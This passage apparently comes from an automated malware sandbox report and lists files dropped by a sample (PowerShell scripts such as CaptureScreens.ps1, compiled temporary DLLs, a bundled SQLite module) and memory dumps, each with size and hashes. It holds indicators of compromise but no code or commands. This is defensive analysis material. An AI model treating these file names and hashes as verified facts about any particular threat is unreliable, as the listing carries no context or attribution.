ce4f76117f1c6dd5090aca865c00e4c6379a4e61cb90870af863e330a96daf77

SHA512
eb84565ae81a97c7cbbac711c005aab52dda7e3dd63a8d4555c4c4c9c874472ad1e2899bb2d173b4d0530c1581c8359699016c70c7c3ad7721ae4d5fd447c93d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
843236648c17e7b11d720f5613760d8a

SHA1
3817030c1334fee32e1c0e6ad08e9cc1392fbedb

SHA256
309c24cd0ff95d7ceb33d58b206fe5d1d31fedadaa36d6e71e2afd444184ea0d

SHA512
e2dbc0bba9dada38be74f7a1d4d4aac5ee60eaa78114643f02883973adfc45b7555cf580d70b541c8ee1626242c2ee61469577c0a17f13d0cd0303d402a8b3aa

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
446dd1cf97eaba21cf14d03aebc79f27

SHA1
36e4cc7367e0c7b40f4a8ace272941ea46373799

SHA256
a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

SHA512
a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
ac70d9261865560c2ae907af2692d892

SHA1
b9241fdeac49d93f28a249a59f52eba5e6697ac2

SHA256
9ee5da7205ac68f7aa19883ee10240ed12dfb7edef96c3ac007379d17c162d68

SHA512
2ad8f5494494745386f11b7a757b766458f2c89447fd3e1674393e682d6ac589587321be762dacb0042d7a9ff1c34c4ebf25472e2bb58e909f723cb0d81751d1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
d8b9a260789a22d72263ef3bb119108c

SHA1
376a9bd48726f422679f2cd65003442c0b6f6dd5

SHA256
d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc

SHA512
550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b

Download Submit
C:\Users\Admin\AppData\Local\Temp\CaptureScreens.ps1

Filesize
2KB

MD5
5cf6200f838fa5079ca2f53f160f15c5

SHA1
cca79ae272dabcc69544c05494ed16309d0bf2fa

SHA256
ef4c0059f1afe2e4e6c5021062d99010c1c1e7873c2c6b8068dcdad50448712c

SHA512
82031e92ef73ae9bcaf4493458edb5a0f4501430a43ca11c143fde6e139d627eb9ff93c4ea82144d242a042f652874bf90d43a26ad84ee2a4964a3ce4f936e7c

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES7232.tmp

Filesize
1KB

MD5
5888083a7e4b3b58d166c541363468eb

SHA1
d153d3f110d3ab1de3e4a1390978e8afb9da847d

SHA256
901751ed969ed58448c96811eae92179b632b62809c6dd831109cf53cee28cf7

SHA512
691392cfa9eee5cafdbfe4916e5f46bfae2a3fa8f27d52e01080335141da55c8494010bf60e9e5f65ea8357b4b7b9a02218085b28c5703c90468657ebd55a674

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES7927.tmp

Filesize
1KB

MD5
0ae661c66ce52cfddabf960f00ca2cb5

SHA1
257ae308f9974a7d98efa8a650c3031e7a00c4b5

SHA256
d50ed730368111eb8987d70dc006759da9d1fe2e25c7fca03fb8a667afa1fad7

SHA512
c53cf144a2471c559f54a6060de64ee8f9da67922dec06439b700b33bc2e78598b5ff94ab15d9c58d0f6929734843a3757207c67024b9e376930450bf5e319c0

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pvadmrp0.rbk.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\imogunqh\imogunqh.dll

Filesize
3KB

MD5
7bfb8932531a23ca4d973ccc01c3a6fd

SHA1
b9414375b37588d5654e292689cf169f1a82a81f

SHA256
aeb6c7293a986cdaf0dd2cd87495cca39a6e95115c4184655a5eb5d85811b440

SHA512
ceb7169a5e7253d79991cb7f5e62029fdcf0f2aae4af9301a4ae6f90419acdd6ca4d0d151233ff3b59398638c0e1ed1640d925905fd2a603766a0df18e3614ec

Download Submit
C:\Users\Admin\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\build\Release\node_sqlite3.node

Filesize
1.8MB

MD5
66a65322c9d362a23cf3d3f7735d5430

SHA1
ed59f3e4b0b16b759b866ef7293d26a1512b952e

SHA256
f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c

SHA512
0a44d12852fc4c74658a49f886c4bc7c715c48a7cb5a3dcf40c9f1d305ca991dd2c2cb3d0b5fd070b307a8f331938c5213188cbb2d27d47737cc1c4f34a1ea21

Download Submit
C:\Users\Admin\AppData\Local\Temp\rtilicx4\rtilicx4.dll

Filesize
3KB

MD5
9d73cfd571d6d28b670625de59b34ae3

SHA1
1d623fb4a0d9424a20cafc3f1875ada087208924

SHA256
a44ef90b9eecbd7e4b614783c85579bced861ecbed62821454ceb65f78945aaa

SHA512
2bed1a3258bd78168a2728cdc02eeced50dffdd6ac2a254e6ddac4a1043344d6ae0819e7797865849f83502b948a71df22c39706f08752020a20edde873ce7fb

Download Submit
C:\Users\Admin\AppData\Local\Temp\temp.ps1

Filesize
379B

MD5
18047e197c6820559730d01035b2955a

SHA1
277179be54bba04c0863aebd496f53b129d47464

SHA256
348342fd00e113a58641b2c35dd6a8f2c1fb2f1b16d8dff9f77b05f29e229ef3

SHA512
1942acd6353310623561efb33d644ba45ab62c1ddfabb1a1b3b1dd93f7d03df0884e2f2fc927676dc3cd3b563d159e3043d2eff81708c556431be9baf4ccb877

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\imogunqh\CSC82BB281C1B4047FBA141ABC01ED052FB.TMP

Filesize
652B

MD5
49102060179bfaf2e119c592c5863c92

SHA1
5c0232ab749d5726cd5077aa6f1a032d330ae261

SHA256
eabc9ce7dd49db7784dcf39ca27d5b6f49dc2921b181c6cd5f0a9479341fde66

SHA512
edb9c42aa282ccb0fadb964bcf04b655949aa013b4cc1ad795e49e715cdb0f1211f2f738e173065576990bc5e9d1c0bc0b4f809bbeab74bd9ffc795a45c05a68

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\imogunqh\imogunqh.0.cs

Filesize
426B

MD5
b462a7b0998b386a2047c941506f7c1b

SHA1
61e8aa007164305a51fa2f1cebaf3f8e60a6a59f

SHA256
a81f86cd4d33ebbf2b725df6702b8f6b3c31627bf52eb1cadc1e40b1c0c2bb35

SHA512
eb41b838cc5726f4d1601d3c68d455203d3c23f17469b3c8cbdd552f479f14829856d699f310dec05fe7504a2ae511d0b7ffff6b66ceadb5a225efe3e2f3a020

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\imogunqh\imogunqh.cmdline

Filesize
369B

MD5
2b1e4a33d7b8b3bed4ecdb82e35f6068

SHA1
cbf8ce84b4afa0647831dbc5380d7c1b088eccc3

SHA256
1af520351b214a86fbe6fb5c4d252b09aaae3e637bc1049d52bf7ddaa3b41202

SHA512
ffd9a8ccb9d1aeb7fb638388f99e4a81681d26e5cf8e4401c5f283e93c13707810f2531ebde55629a4a00438c22d8512242f03a3a3e2fd8022465aaa877a5070

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\rtilicx4\CSC5A14A872DEB44DE09F2D483B851F99B.TMP

Filesize
652B

MD5
b96a569897e95537fccacf2da65a905b

SHA1
5fcf0790540d88c8dba97eeac3b6fd55f004021f

SHA256
2079a27f98e36f5c70a9c0191b8fc8a1187eb6e93fc60407a901673ef0946973

SHA512
fb91d5642d51eec599393894c79048f4f4aa0ca4f442d3302a8a8949be5bac7165c2c7d8c9a8617b5b4dcfeca439463bf6d1b19fc63be5048816a140a69090d2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\rtilicx4\rtilicx4.0.cs

Filesize
311B

MD5
7bc8de6ac8041186ed68c07205656943

SHA1
673f31957ab1b6ad3dc769e86aedc7ed4b4e0a75

SHA256
36865e3bca9857e07b1137ada07318b9caaef9608256a6a6a7fd426ee03e1697

SHA512
0495839c79597e81d447672f8e85b03d0401f81c7b2011a830874c33812c54dab25b0f89a202bbb71abb4ffc7cb2c07cc37c008b132d4d5d796aebdd12741dba

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\rtilicx4\rtilicx4.cmdline

Filesize
369B

MD5
7f6d75ca4e9f4ce7e81d38031f44f8f4

SHA1
daf1378aa0437774c08b02550a2b4a94eb9705c0

SHA256
bd4a48dc49a797ae006d1b85ac98702f75188858d598b1105b5ca2887bbb6269

SHA512
e4a2c54947eae9fd7519738cd7d05cf8b4eb61b8a7e2f193f32a446f5d3bd4bac6dacab9fa50dece52eb2d20df11689b5347e1eb0e53d095f6c31c927de44ca9

Download Submit
memory/1036-84-0x00007FFC7C2D0000-0x00007FFC7CD92000-memory.dmp

Filesize
10.8MB

Download
memory/1036-83-0x00007FFC7C2D0000-0x00007FFC7CD92000-memory.dmp

Filesize
10.8MB

Download
memory/1036-82-0x00007FFC7C2D0000-0x00007FFC7CD92000-memory.dmp

Filesize
10.8MB

Download
memory/1036-85-0x0000027950BD0000-0x0000027950C16000-memory.dmp

Filesize
280KB

Download
memory/1036-73-0x0000027950B10000-0x0000027950B32000-memory.dmp

Filesize
136KB

Download
memory/1036-98-0x0000027950BB0000-0x0000027950BB8000-memory.dmp

Filesize
32KB

Download
memory/1036-72-0x00007FFC7C2D3000-0x00007FFC7C2D5000-memory.dmp

Filesize
8KB

Download
memory/1036-102-0x00007FFC7C2D0000-0x00007FFC7CD92000-memory.dmp

Filesize
10.8MB

Download
memory/1980-113-0x0000022C2C270000-0x0000022C2C2C0000-memory.dmp

Filesize
320KB

Download
memory/5688-185-0x00000227F6430000-0x00000227F6438000-memory.dmp

Filesize
32KB

Download